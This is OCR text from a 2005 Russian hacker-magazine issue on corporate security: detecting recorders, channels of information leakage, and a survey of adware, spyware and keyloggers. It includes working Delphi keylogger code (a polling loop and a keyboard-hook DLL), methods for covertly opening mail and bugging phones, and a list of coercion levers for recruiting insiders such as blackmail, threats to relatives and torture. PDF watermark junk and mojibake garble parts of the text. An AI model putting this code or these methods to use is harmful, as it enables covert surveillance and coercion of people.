Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

Специальный выпуск 60_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

8.56 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 56 / 146 7 8 9 10 11 12 13 14 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F									t
	D									i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to

											m
w
	w									o
	.						g		.c
		p					g
			df			n		e
				-xcha

ли в тайной комнате имеется достаточно ценная информация.

То, что оборудование тайных комнат и их обследование достаточно сложно и трудоемко, уже выяснено. Но не будешь же ты молча сидеть и с довольной миной созерцать потолок? Переходим к следующей теме - переговорам :).

БЕЗОПАСНОСТЬ НА ПЕРЕГОВОРАХ

Итак, ты со своим знакомым из конкурирующей фирмы сидишь в комнате для переговоров, оборудованной по последнему слову техники, стоимостью $100 000, на сделанных из прозрачного пластика стульях, за столом из мутного стекла (чтобы потенциальный злодей не увидел твой кольт) и пьете абсолютно чистую водопроводную воду, ведете задушевные разговоры о погоде или новых расценках на Новодевичьем кладбище. Вдруг у тебя возникает мутное предчувствие, что собеседник горит желанием поделиться вашей беседой со своими знакомыми и, скептически оценив свою память, прихватил с собой что-то вроде дик-

тофона. Обнаружить такую игрушку довольно сложно, поскольку ее создавали специально для этого и предусмотрели практически бесшумную работу всех механизмов, в том числе электродвигателя, экранированные записывающие части (если используется лента, магнитный или лазерный диск), микросхемы, сжимающие речь (чтобы больше цифровой информации влезло на микросхемы памяти flash-карты), и даже корпус. Хо- чу заметить, что в понятие "диктофон" сейчас уже можно включить большинство мобильных телефонов, карманных компьютеров и практи- чески все модели MP3-плееров. Если есть возможность, пропускай всех своих собеседников через металлодетектор, чтобы обнаружить проносимое устройство. Увы, без предварительной договоренности собеседники могут резко отрицательно отнестись к осмотру и выдать вслух пожелание дальней дороги в ненормативных выражениях. На помощь приходят устройства, выполняющие выявление и анализ изменения параметров электромагнитных полей в непосредственной близости от участников переговоров. Путем обработки информации, накопленной таким образом, удается выделить поле, создаваемое работающим диктофоном, расположенным на расстоянии от нескольких десятков сантиметров до нескольких метров (в зависимости от модели) через соответствующий дат- чик. Например, модель для обнаружения диктофонов отечественной фирмы "Смерш техникс" ST 0110

Путем обработки информации, накопленной таким образом, удается выделить поле, создаваемое работающим диктофоном.

Прибор обнаружения средств негласного съема информации OSC-5000

(на 16 человек) стоимостью 4400 у.е., по информации, заявленной на сайте производителя, позволяет обнаружить, например, следующие модели диктофонов: OLYMPUS V-90, SAMSUNG SVR-S820 с расстояния

1 м, а OLYMPUS D-1000, SONY M-909 и OLYMPUS S726 с расстояния 50–70 см.

Диктофон выявлен, что делать? Если каким-то образом удалось узнать, что используется диктофон с магнитной лентой, можно нарушить его работу подавителем диктофонов. Принцип его работы основан на изменении под действием создаваемого им поля режимов усилителей записи, в результате чего становится невозможно воспроизвести или разобрать речь. Примером таких устройств является "Буран" и "Шумотрон".

Если же сведений о типе диктофона нет, остается посоветовать чтонибудь собеседнику, или намекнуть на его заряженность (можно при этом продемонстрировать свой заряженный кольт), или же перевести разговор на тему погоды.

ЗАКЛЮЧЕНИЕ

Как упоминалось в начале статьи, информация стала товаром, за который можно получить реальные или безналичные условные единицы. И если ты располагаешь таким товаром, будь готов к борьбе с посягательствами бяк-конкурентов. Естественно, в рамках этой статьи было проведено только поверхностное обсуждение, но, надеюсь, ты уже подкован в методах защиты своих информационных ценностей. Вопрос о выборе методов обычно сводится к нежеланию расставаться с денежными средствами, которые можно употребить, казалось бы, на более насущные нужды.

Не нужно забывать, что одного хищения твоей сокровенной информации вполне хватит для возникновения проблем, решение которых обойдется на порядок дороже, чем та же система безопасности, от которой ты в свое время отказался. Необходимо реально представлять ценность скрываемых данных и возможности твоих конкурентов (какие расходы на проникновение в твою тайную комнату они могут позволить себе?) и в соответствии с этим определять степени и методы защиты. С особой тщательностью следует выбирать фирмы, предоставляющие услуги по обеспечению защиты информации. Вполне реально, что при очередном специальном расследовании некоторые специалисты получают условные единицы от твоих конкурентов, которым ничего не стоит обнаружить старые жучки и незаметно поставить новые. E

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i	r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha				Ó Ã Ð Î Ç À
								Ó Ã Ð Î Ç À
								Ñ Ê Ð Û Ò À ß

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
	Ó Ã Ð Î Ç À			-xcha
	Ó Ã Ð Î Ç À
	Ñ Ê Ð Û Ò À ß

50 СЛЕЖКА В ЖИЗНИ КАНАЛЫУТЕЧКИИНФОРМАЦИИ

Lundes (lunde@scn.ru)

КАНАЛЫ УТЕЧКИ ИНФОРМАЦИИ

ОТКУДА ИСХОДИТ УГРОЗА

Èнформация правит миром. Кто владеет информацией, владеет всем! Это не пафосные лозунги, а реалии жизни. Информация бывает очень ценной. Настолько ценной, что может не хватить разрядности калькулятора для

подсчета всей капусты, которая будет нарублена благодаря добытой информации.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

	»			БЛАГОДАТНАЯ		цию по крупной производственной		6. С сайтов объявлений о продаже
				ПОЧВА		компании в отдаленном регионе, при-	ценных бумаг и векселей путем ана-


					Простейший при-	чем очень быстро. Фактографичес-	литического анализа были установле-



				мер - инсайдерская ин-		кую информацию, финансово-эконо-	ны связи этих фирм.


				формация. Представь,		мическую справку, инвестиции орга-		7. Персональная информация со-
	что некто знал о готовившихся взры-					низации, сведения о перспективах	держалась на сайтах местных СМИ и
	вах в Лондоне, последствия которых					развития, социально-политическая	официальном сайте компании.
	отразились на всех фондовых рын-					информация, связи с компаниями, ра-		8. Компрометирующие материалы –
	ках. Этот некто вложил деньги в цен-					ботающими с ценными бумагами, пер-	на сайтах местных и центральных
ные бумаги и играл на понижение кур-						сональная информация и компроме-	СМИ, специализирующихся на "горя-
	са. Он получил прибыль просто за					тирующие материалы.	ченьком" материале.
	знание информации. Пусть курс ак-					Возможно два выхода: связаться с
ций прыгнул на 10%. Усама, который						человеком, который может "сдать		В этом примере использовались отк-
	Бэн Ладен, при вложениях в 10 млн.					контору", или обойтись подручными	рытые источники информации – архи-
	у.е. получит прибыль около 1 млн. у.е.					средствами.	вы газет, телевидение. Информация,
Все просто, как 2х2.						Подручные средства – поисковые	полученная в ходе электронной вен-
Еще один пример: утечка информа-						сайты, архивы СМИ. Необходимо сде-	тиляции СМИ, носит неявный харак-
ции о проверках поставок "серых" со-						лать несколько разноплановых за-	тер и нуждается в аналитической об-
	товых телефонов могла бы сберечь					просов по известным поисковым сер-	работке. Порядка 10-15% информации
	несколько тонн долларов. Чем боль-					верам и скопировать всю информа-	содержится в готовом виде (необхо-
	ше бизнес, тем больше нюансов дол-					цию, где упоминается данная компа-	дима только верификация), осталь-
	жен учитывать руководитель – знать,					ния. Далее наступает этап анализа	ные 85-90% получаются в результате
	изучать, исследовать конкурентов.					материала.	сравнения, анализа и синтеза различ-
	Малозначительная для простого че-					1. Фактографическая информация	ных источников.
	ловека информация в голове профи					о предприятии была получена с
	преобразуется в мощный ключ от					собственного сайта предприятия (ис-	ПРОТИВОДЕЙСТВИЕ
	многих дверей, осколки складываются					тория компании, реквизиты, руковод-		Противостоять аналитической раз-
	в четкую картину, как пазлы.					ство, структура, перечень необходи-	ведке практически невозможно. СМИ
На такой благодатной почве и пло-						мого сырья и производимой продук-	может стать каналом утечки инфор-
	дятся Спец-Хакеры :), которые ориен-					ции), сайтов региональной Торгово-	мации, если корреспонденты увлекут-
тированны на получение информации						промышленной палаты, администра-	ся шпионскими играми и PR-отдел
под конкретного заказчика и на конк-						ции области и города.	компании взболтнет лишнего.
	ретную организацию. Официально					2. Финансово-экономическая ин-
они зарегистрированы как ЧОП (част-						формация была получена: сайт Феде-	СОТРУДНИКИ
	ные охранные предприятия), СБ					ральной комиссии по ценным бумагам			Агентурная разведка на сегод-


(службы безопасности), детективные						(история котировок акций), сайты кон-	няшний день остается основным ви-
агентства. Часто, чтобы не подстав-						салтинговой компании, сайты СМИ,	дом разведывательной деятельности.
	лять основную контору, именно они					специализирующихся на обзоре и	Кто же расскажет обо всем лучше,
	занимаются анализом конкурентов,					анализе экономической информации	чем человек, работающий "на объек-
	промышленным и экономическим					("Эксперт", "Коммерсант"). На сайте
шпионажем и другими "темными" де-						Министерства по налогам и сборам
ëàìè.						можно получить информацию по за-
		Главными носителями являются:				долженности в бюджет.
	знающие люди, документы, средства					3. На сайте Администрации и дочер-
	беспроводной и проводной связи (те-					них компаний была получена инфор-
лефоны, телефаксы, радиостанции),						мация об инвестиционных проектах.
	электронные системы обработки ин-					4. На сайте отраслевого журнала
	формации (компьютеры) и разные					была получена информация о перс-
отслеживаемые факторы (поведение,						пективах развития и весьма любопыт-
	разговоры, результаты действий).					ные обзоры отрасли.
						5. На сайте местных СМИ содержа-
ОТКРЫТАЯ ИНФОРМАЦИЯ						лась информация о социально-поли-
			Приведу такой пример. Необходи-			тической деятельности компании.


	мо подготовить следующую информа-

ХАКЕРСПЕЦ 11(60) 2005

				hang		e
			C			e	E
		X					E
	-							d
	F									t
	D									i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to

											m
w
	w									o
	.						g		.c
		p					g
			df			n		e
				-xcha

те"? Он и документы пощелкает фотоаппаратом, и "по душам" поговорит. Можно выделить группы риска среди сотрудников - работающие с первыми лицами предприятия (секретарь, водитель, помощник или уборщица). К этим лицам следует присмотреться с особым вниманием.

Существует множество способов привлечь сотрудника на свою сторону. Р. Ронин в книге "Своя разведка" выделяет ряд мотивов выдачи индивидом специфичной информации:

1.Алчность. С заинтересованной стороны - обещание или же предоставление денег, прочих материальных ценностей.

2.Страх (шантаж, порой угроза либо факт грубого физического или утонченного психологического воздействия).

3.Страх за своих близких (явная угроза либо факт разнотипного насилия в духе похищения, избиения, из-

насилования, кастрации, "сажания на иглу", полного физического устранения...).

4.Фактор боли (качественная пытка или угроза интенсивного болевого воздействия).

5.Сексуальная эмоциональность (ловкое подсовывание полового партнера и различной порнографии с перспективой "расслабления", шантажа или обмена).

6.Безразличие (четкая реализация депрессии, возникающей в результате инспирированных или спонтанных жизненных обстоятельств, иногда в результате психофизической обработки объекта).

7.Внутренний авантюризм (предоставление шансов индивиду для ведения им своей игры).

8.Счеты с госсистемой или организацией (умное использование идеологических разногласий и существующей неудовлетворенности объекта своим нынешним положением либо перспективой).

9.Счеты с конкретными лицами (разжигание негативных чувств, например мести, зависти и неприязни с непреодолимым желанием нанести "врагу" определенный ущерб).

qP. Национализм (игра на глубинном

ощущении некоей национальной общности, ненависти, гордости, исключительности).

qQ. Религиозные чувства (пробуждение неприязни к "иноверцам" или же привязывание определенной ситуации к избранным доктринам исповедуемой религии).

qW. Гражданский долг (игра на законопослушности).

qE. Общечеловеческая мораль (игра на порядочности).

qR. Подсознательная потребность в самоуважении (спекуляция на идеальных представлениях человека о самом себе).

qT. Корпоративная (клановая) солидарность (игра на конкретной элитарности).

qY. Явная симпатия к получателю или его делу ("резонирующая подстройка к объекту").

qU. Тщеславие (спекуляция на желании объекта произвести определен-

Практически любой сотрудник является носителем конфиденциальной информации.

"Документы на стол! - закричал Штирлиц и врезал Мюллеру в ухо. - Кстати, Мюллер, не найдется ли у Вас канцелярских скрепок?" Голос за кадром: "Штирлиц знал, что лучше всего запоминается последняя фраза и, если Мюллера спросят, зачем приходил Штирлиц, тот ответит: "За канцелярскими скрепками".

51
ное впечатление, показать свою зна-
чимость и осведомленность).
	qI. Легкомыслие (приведение чело-
века в беззаботнейшее состояние не-
осмотрительности и болтливости; к
этому же можно отнести задействова-
ние "хронотопа" - явно повышенной
доверчивости человека в некое вре-
мя и в определенном месте ("случай-
ный попутчик").
	qO. Угодливость (четкая реализация
подсознательной (волевой) и осоз-
нанной (деловой и физической) зави-
симости объекта от получателя).
	wP. "Помешательство" на чем-либо
(близкая возможность для коллекци-
онера приобрести (или потерять)
страстно желаемую вещь; игра на
фобиях).
	wQ. Нескрываемый расчет получить
определенную информацию взамен
(техники "баш на баш" или "вожде-
íèÿ çà íîñ").
	wE. Страстное стремление убедить в
чем-либо, изменить отношение к че-
му-либо (или кому-либо), побудить к
определенным действиям (методы
"заглатывания наживки" и "обратной
вербовки").
УВОЛЕН И ОЧЕНЬ ОПАСЕН
		Практически любой сотрудник яв-


ляется носителем конфиденциальной
информации. По законодательству,
организация обязана предупредить
сотрудника об увольнении за нес-
колько недель, так что у заинтересо-
ванных лиц будет предостаточно вре-
мени. Канал утечки информации воз-
никает, если это пригодится уволен-
ному сотруднику на будущей работе
или еще для каких-либо целей, при-
чем цель нанести ущерб работодате-
лю может быть реализована как по
собственной инициативе информанта,
так и по инициативе заинтересован-
ных третьих лиц.
ПРОТИВОДЕЙСТВИЕ
Определение сотрудников, которые
могут или собираются уволиться,
разграничение информации между
сотрудниками, создание условий, при
которых невозможно вынести объек-
ты, содержащие информацию, невоз-
можность копирования конфиденци-
альной информации, представление
информации определенного грифа
секретности благонадежным лицам.
КАНАЛЫ СРЕДСТВ ПЕРЕДАЧИ
И ОБРАБОТКИ ИНФОРМАЦИИ
		Специальные технические сред-


ства позволяют производить съем ин-
формации при значительном удале-
нии от объекта и относительной прос-
тоте использования спецсредств, поэ-
тому получать информации становит-
ся безопасным и перспективным.
ТЕЛЕФОН, ФАКС
	По телефону говорят все и часто го-
ворят что надо и что не надо. Снятие
информации с телефонной линии			»

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha				Ó Ã Ð Î Ç À
								Ó Ã Ð Î Ç À
								Ñ Ê Ð Û Ò À ß

Чем больше используемых средств связи и публичной информации, тем проще достать необходимые сведения.

конна продажа или покупка ценных бумаг теми, кто обладает инсайдерской информацией или может раскрыть ее осуществляющим такие сделки.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
	Ó Ã Ð Î Ç À			-xcha
	Ó Ã Ð Î Ç À
	Ñ Ê Ð Û Ò À ß

По статистике, только малой части сотрудников (1025%) можно полностью довериться. И примерно такое же количе- ство сотрудников воспользуются конфиденциальной информацией в корыстных интересах при первом удобном случае.

Перлюстрация - скрытое извлечении информации из запечатанных писем.

hang

NOW!

СЛЕЖКА В ЖИЗНИ

КАНАЛЫУТЕЧКИИНФОРМАЦИИ

BUY

w Click

можно осуществить несколькими спо-

БЕЗОПАСНОСТЬ КОММЕРЧЕСКОГО ОБЪЕКТА

f-x chan

собами:

Подключившись к линии непосре-

В соответствии с общей теорией безопасности,

существует

дственно на АТС или посредством

десять базовых угроз, а именно:

СОРМ (последнее доступно только

1. Деятельность государства;

сотрудникам спецслужб).

Имитировав поломку телефона и

2. Деятельность иностранных государств;

забрав его на ремонт, можно устано-

3. Превышение полномочий государственных чиновников;

вить в него "закладку" или "жучка".

4. Нестабильность экономики государства;

Прослушивание помещения пос-

5. Конкурентная борьба;

редством акустопреобразовательных

6. Коммерческие партнеры;

элементов телефонов (громкоговори-

тели, электромеханическая звонковая

7. Собственная некомпетентность;

цепь, микрофоны).

8. Организованная преступность;

Прослушивание помещения пос-

9. Собственный персонал компании;

редством высокочастотной накачки

qP. Техногенные и природные факторы.

(генератор излучает ВЧ-сигнал в теле-

фонную линию, и на определенной

резонансной частоте ВЧ-сигнал моду-

лируется звуковыми колебаниями в

помещении).

СОТОВЫЕ

Утечка информации возможна че-

рез сотрудника АТС или спецслужб.

ПЕРСОНАЛЬНЫЕ РАДИОСТАНЦИИ

Необходимо знать только частоты, на которые настроены служебные радиостанции, а из разговоров службы безопасности или диспетчеров можно выудить море полезной информации.

КОМПЬЮТЕР

На компьютере даже рядового сотрудника может храниться воистину громадное количество полезной информации. Компьютеры, находящиеся на гарантийном и послегарантийном обслуживании, со всеми потрохами увозят в мастерские, а там, представившись сотрудником компании, которому очень-очень срочно понадобились личные файлы со служебного компьютера, можно качнуть и пару гигабайт конфиденциальных документов.

ЭЛЕКТРОННАЯ ПОЧТА

Взлом электронной почты - вполне реальное дело и богатый источник информации.

ПЕЙДЖЕРЫ

Перехват пейджинговых сообщений легко осуществим. Ноутбук, FM-тюнер и программа – это все, что понадобится тебе.

СПЕЦИАЛЬНЫЕ ТЕХНИЧЕСКИЕ СРЕДСТВА

Для ввоза специальных технических средств, применяемых для добычи информации, предусмотрена специальная регистрация, и ее пока никто не отменял. По данным МВД РФ, оборот таких средств достигал $1 млрд,

По телефону говорят все и часто говорят что надо и что не надо.

Громкоговоритель как акустопреобразовательный элемент и возможная схема защиты

ХАКЕРСПЕЦ 11(60) 2005

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

оборот же средств по защите информации был на порядок ниже и составлял порядка $100 млн. Число же обезвреженных устройств ничтожно – 5% от общего "поголовья" шпионской техники.

КОНТАКТНЫЙ МИКРОФОН

Для съема акустической информации достаточно обычного медицинского стетоскопа или бокала. Превосходно подходят головки от проигрывателей и пьезоизлучатели. Такие устройства прикрепляют к противоположной стороне стены, трубам водопровода или батареям отопления.

НАПРАВЛЕННЫЕ МИКРОФОНЫ

Представляют собой высокочувствительные микрофоны, оборудованные параболическими зеркалами, позволяют своему владельцу селективно фокусироваться на объекте на большом расстоянии от него.

ФОТОГРАФИРОВАНИЕ И ВИДЕОСЪЕМКА

Современные цифровые камеры очень компактны, а длиннофокусные объективы позволяют фотографировать, находясь на удалении до сотен метров и даже до километра. Для фотосъемки в темноте применяют инфрахроматические пленки и вспышки с черными светофильтрами, пропускающими свет в ИК-диапазоне.

ДОКУМЕНТЫ

Документы можно скопировать, можно заполучить их оригинал или ознакомиться с их содержанием. Необходимо получить доступ в помещение, где хранятся интересующие тебя документы, например под предлогом уборки помещения, мытья окон, ими-

тации кражи со взломом. Но самой незаметной является потеря документа: при переезде компании из одного офиса в другой часто теряются целые папки и архивы.

Копирование документов можно осуществить с помощью фототехники или по старинке - копировальным аппаратом. Либо банально ознакомиться с содержанием документа и вернуть его на место.

ПЕРЕХВАТ ПИСЕМ

Осуществляется у отправителя, в пути или у получателя. Подкуп или обман почтальонов, вскрытие и имитация почтовых ящиков, перехват почтовых машин в пути.

Для доступа к уже перехваченным письмам применяются следующие методы:

Мощное просвечивание и фотографирование письма без вскрытия конверта.

Опрозрачивание конверта специальным спреем.

Грубое вскрытие письма с подделкой конверта.

Вытягивание накрученного письма на две тонкие металлические спицы через щель в углу конверта.

Осторожное вскрытие и такое же осторожное запечатывание послания (применяется отпаривание клеевого шва с помощью водяного пара).

МУСОРНАЯ КОРЗИНА

Не все организации пользуются уничтожителями бумаг, а зря! Опечатки, неточности - и документ попадает

âкорзину. А оттуда к...

Выявление возможных источников

информации – это, прежде всего, анализ информационных связей сотрудников предприятия и его руководства в органах власти и управления, правоохранительных органах, банковских кругах и средствах массовой информации.

Этап выявления возможных источ- ников информации – важнейший этап разведывательной деятельности, немыслимый без творческого подхода и фантазии. E

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

hang

NOW!

BUY

КОМПЬЮТЕРНАЯ РАЗВЕДКА

ПОВЕСТЬОРАЗВЕДЧИКАХ

BUY

w Click

Зайцев Олег (z-oleg.com/secur)

Content:

-xcha

ПОВЕСТЬ

-x cha

54 Повесть о разведчиках

Классификация и принципы работы

Создание электронного Штирлица

О РАЗВЕДЧИКАХ

компьютерных шпионов

58 Виртуальный шпион

64 Охота на КАИНа

Не поможет антивирус, не поможет

КЛАССИФИКАЦИЯ И ПРИНЦИПЫ РАБОТЫ

файрвол?

70 Компьютерный

КОМПЬЮТЕРНЫХ ШПИОНОВ

СМЕРШ

Находим и уничтожаем врагов

народа без помощи спецслужб

76 Секреты Open Source

последние пару лет от AdWare, SpyWare, Dialer и аналогичных программ,

Âмягко говоря, не стало житья. Если обстановка не изменится, по своим

Действительно ли открыты открытые

исходники

масштабам эта проблема приблизится к проблеме спама. Врага нужно знать в ли-

82 Есть ли троян в PGP

цо, поэтому в этой статье поговорим о наиболее распространенных программах.

Мифы и реальность

ADWARE È SPYWARE

ads.180solutions.com (64.94.137.51) è

AdWare - это программы,

ping.180solutions.com 64.94.137.57. Повисев

воспроизводящие рекламу. В

некоторое время в памяти, процесс наглеет,

лучшем случае - программы,

и фиксируется массированная закачка ин-

которые воспроизводят рек-

формации из интернета, которая идет с

ламу в качестве платы за свое использова-

209.164.32.205, 216.74.27.26, 64.94.137.62.

ние. Примеров AdWare множество, возьмем

Анализ пакетов показал, что закачиваются

хотя бы FlashGet. Его незарегистрированная

исполняемые файлы. Исследование системы

версия отображает в верхней части окна

после завершения загрузки показывает, что

баннер. В таких программах реклама отобра-

в ключе Run появился еще один параметр с

жается только в рамках окна программы и

именем elqb, предназначенный для запуска

только во время ее работы. Приложения это-

elqb.exe, появившегося в папке Windows.

го класса не наносят много ущерба, и, кроме

После перезагрузки зараженного ПК он вы-

расхода трафика, они ничем не навредят.

ясняет адрес config.180solutions.com через

Следующим вариантом AdWare является

DNS и начинает обмен с ним (причем напря-

внешний модуль, который вызывается при-

мую, настройки прокси в IE он игнорирует).

ложениями для отображения рекламы. Це-

Обмен происходит интереснее: по методу

ли и задачи аналогичны - взимать неявную

POST на сервер передается блок данных

плату за использование программы. Клас-

приличного размера, содержащий, в част-

сический пример – весьма популярный

ности, параметр с именем "MT", содержащий

КОМПЬЮТЕРНАЯ

AdWare.Cydoor. Его главная библиотека

уникальный номер, присвоенный пораженно-

именуется CD_CLINT.DLL и размещается в

му компьютеру. Кроме того, шпион передает

system32.

версию операционки, имя исполняемого

Наконец, AdWare-программы третьего и са-

файла прописанного по умолчанию браузе-

мого обширного класса скрытно прописыва-

ра и его версию. Ответ на этот запрос еще

ются на компьютере и крутят рекламу. Есте-

интереснее, и он представляет собой скрипт,

ственно, создатель такой программы получа-

управляющий шпионом. В скрипте описыва-

ет на рекламе неплохую копеечку, а пользо-

ется, откуда следует качать новые версии

ватель - сильную головную боль.

(URL, размеры файлов и их цифровые под-

РАЗВЕДКА

SpyWare - это шпионская программа. Ее

писи); длинные списки доменов, для которых

главная цель - собирать данные о пользова-

не нужно "шпионить"; также информация о

набрать статистику для решения разных мар-

перехватчик, который просматривает сооб-

теле и передавать их своему создателю. Раз-

том, куда нужно внедрять перехватчик:

ница между AdWare и SpyWare (а часто и

между Spyware и трояном) весьма условна.

/hooked=IEFrame+MozillaWindowClass+AOL~Frame2

Многие производители AV-продуктов не за-

5+MSN6~Window+CabinetWClass+Internet~Explorer_

морачиваются и не выделяют отдельный

Frame+ExploreWClass

класс Spyware. Например, в классификации

"Лаборатории Касперского" есть лишь

Процесс soap.exe в реальном масштабе

AdWare и трояны. SpyWare отличаются от

времени шпионит за браузером, регистрируя

троянов тем, что собираемая ими информа-

все вводимые URL (со всеми параметрами).

ция не является критической, то есть

Другим интересным наблюдением является

SpyWare-программы не передают пароли или

появление на диске библиотеки saaphook.dll,

номера кредитных карт - это "привилегия"

которая внедряется в экземпляры GUI-про-

троянов. Главной задачей SpyWare является

цессов, а по совместительству является BHO

повышение эффективности маркетинга: со-

для Explorer. Существует множество вариан-

бирая данные о пользователе, можно подо-

тов этой библиотеки, один из них устанавли-

брать контекстную рекламу для него или

âàåò Hook òèïà 0Ch (WH_CALLWNDPROCRET -

кетинговых задач.

щения, только что обработанные оконной

Поговорим подробнее о типовом SpyWare

процедурой приложения) для процессов iex-

на примере 180Solutions. Его инсталлятор за-

plore.exe в памяти (и не только - настройка

пускается в скрытном виде (без видимых для

задается ключом /hooked в скрипте управле-

пользователя окон, хотя процесс не маскиру-

ния). Другой вариант устанавливает Hook ти-

ется) и начинает "тайный" обмен с

ïà 0Ah (WH_SHELL).

ХАКЕРСПЕЦ

11(60)

2005

				hang		e
			C			e	E
		X					E
	-							d
	F									t
	D									i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to

											m
w
	w									o
	.						g		.c
		p					g
			df			n		e
				-xcha

Keylogger ActualSpy

КЕЙЛОГГЕРЫ

Кейлоггер (он же клавиатурный шпион, клавиатурный снифер, снупер) - это утилита для протоколирования нажатия клавиш. Современный кейлоггер не ограничивается банальной регистрацией кодов нажимаемых клавиш. Он, как правило, умеет протоколировать запуск приложений, привязывать ввод данных к активному окну, снимать скриншоты по расписанию, передавать собранную информацию разными методами (как правило, по почте и по FTP). С техни- ческой точки зрения, кейлоггер может быть построен по трем базовым принципам:

1.Установка хука на клавиатуру и мышку. Это самый распространенный метод, и поймать такой кейлоггер проще всего.

2.Установка драйвера-фильтра. Этот путь сложнее в реализации, но и менее заметен. Пример такого драйвера можно найти на www.wasm.ru.

3.Циклический опрос клавиатуры с большой скоростью.

Конечно, можно придумать и другие методы слежения за клавиатурой, но подавляющее большинство кейлоггеров работают именно по указанным методикам. Вред от кейлоггера очевиден, и самое неприятное в том, что многие антивирусы не детектируют

Family Keylogger

ССЫЛКИ

www.actualspy.ru - домашняя страничка коммерческого кейлоггера Actual Spy.

www.uinc.ru/articles/zametki/001.shtml - статья "Кейлоггер? Это

просто!" с исходниками на C.

http://mp3.fidel.ru/main/smnews_r_324.html - заметка об аппаратном кейлоггере.

www.rootkit.com/ - сайт, посвященный технологиям руткитов, API-шпионов, кейлоггеров и прочим интересным вещам.

кейлоггеры. Тот же AVP если и видит кейлоггер, то только с расширенной базой (сложный вопрос: последний AVP предлагает мне снести даже MIRC, как потенциально опасную программу :) – прим. Лозовского).

В интернете существует великое множество готовых кейлоггеров. В ка- честве примера можно взять ActualSpy.

Этот кейлоггер умеет шпионить за клавиатурой, буфером обмена, принтерами, делать скриншоты, следить за хождениями пользователя в интернет и т.п. Все это пишется в зашифрованные логи, по которым могут строиться отчеты. Естественно, он умеет посылать логи различными способами. Как пример простого кейлоггера можно взять Family Keylogger, который гораздо примитивнее и по функциям, и по интерфейсу.

Я описал лишь два примера, и конечно же, кейлоггеров существует великое множество. Сам по себе кейлоггер прост до безобразия. Вот пример кейлоггера, работающего по методу опроса клавиатуры:

procedure TfrmMain.tmKeyStateCheckTimerTimer(Send er: TObject);

var

i, res : integer; S : string; begin

S := '';

//Цикл опроса состояния клавиш for i := 0 to 255 do begin

//Запрос состояния клавиши i Res := GetAsyncKeyState(i);

if Res <> 0 then

if MapVirtualKey(i, 2) > 0 then

S := S + char(MapVirtualKey(i, 2)) else S := S+'['+inttostr(i)+']'; end;

if length(s) = 0 then exit; Memo1.Lines.Add('Нажаты клавиши

"'+S+'"');

end;

Событие tmKeyStateCheckTimerTimer должно вызываться таймером, задержка - 10-30 мс. Такие кейлоггеры применяются редко, так как несомненный лидер по распространенности - банальный Hook:

library Key; uses WinTypes, WinProcs, Messages;

const

KeyEvent = WM_USER + 1;

type

TUnhookWindowsHookEx = function (hhk: HHOOK): BOOL; stdcall;

TCallNextHookEx = function (hhk: HHOOK; nCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha				Ó Ã Ð Î Ç À
								Ó Ã Ð Î Ç À
								Ñ Ê Ð Û Ò À ß

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
	Ó Ã Ð Î Ç À			-xcha
	Ó Ã Ð Î Ç À
	Ñ Ê Ð Û Ò À ß

56 КОМПЬЮТЕРНАЯ РАЗВЕДКА ПОВЕСТЬОРАЗВЕДЧИКАХ

TSetWindowsHookEx = function (idHook: Integer; lpfn: TFNHookProc; hmod: HINST; dwThreadId: DWORD): HHOOK; stdcall;

var

HookHandle: hHook; hLib : THandle; UnhookWindowsHookEx : TUnhookWindowsHookEx;

CallNextHookEx : TCallNextHookEx; SetWindowsHookEx : TSetWindowsHookEx;

function KeyHook(Code: integer; WParam: word; LParam: Longint): Longint;

var

wnd: hWnd; begin

if Code >= 0 then begin

wnd := FindWindow('TKeyForm', nil); SendMessage(wnd, KeyEvent, wParam, lParam);

Result := 0; end else

Result := CallNextHookEx(HookHandle, code, WParam, LParam);

end;

procedure SetKeyHook; begin

hLib := LoadLibrary('user32.dll'); @UnhookWindowsHookEx := GetProcAddress(hLib, 'UnhookWindowsHookEx'); @CallNextHookEx := GetProcAddress(hLib, 'CallNextHookEx');

@SetWindowsHookEx := GetProcAddress(hLib, 'SetWindowsHookExA');

HookHandle := SetWindowsHookEx(WH_KEYBOARD, @KeyHook, HInstance, 0);

end;

procedure DelKeyHook; begin

if HookHandle <> 0 then UnhookWindowsHookEx(HookHandle); end;

exports SetKeyHook index 1,

DelKeyHook index 2;

begin end.

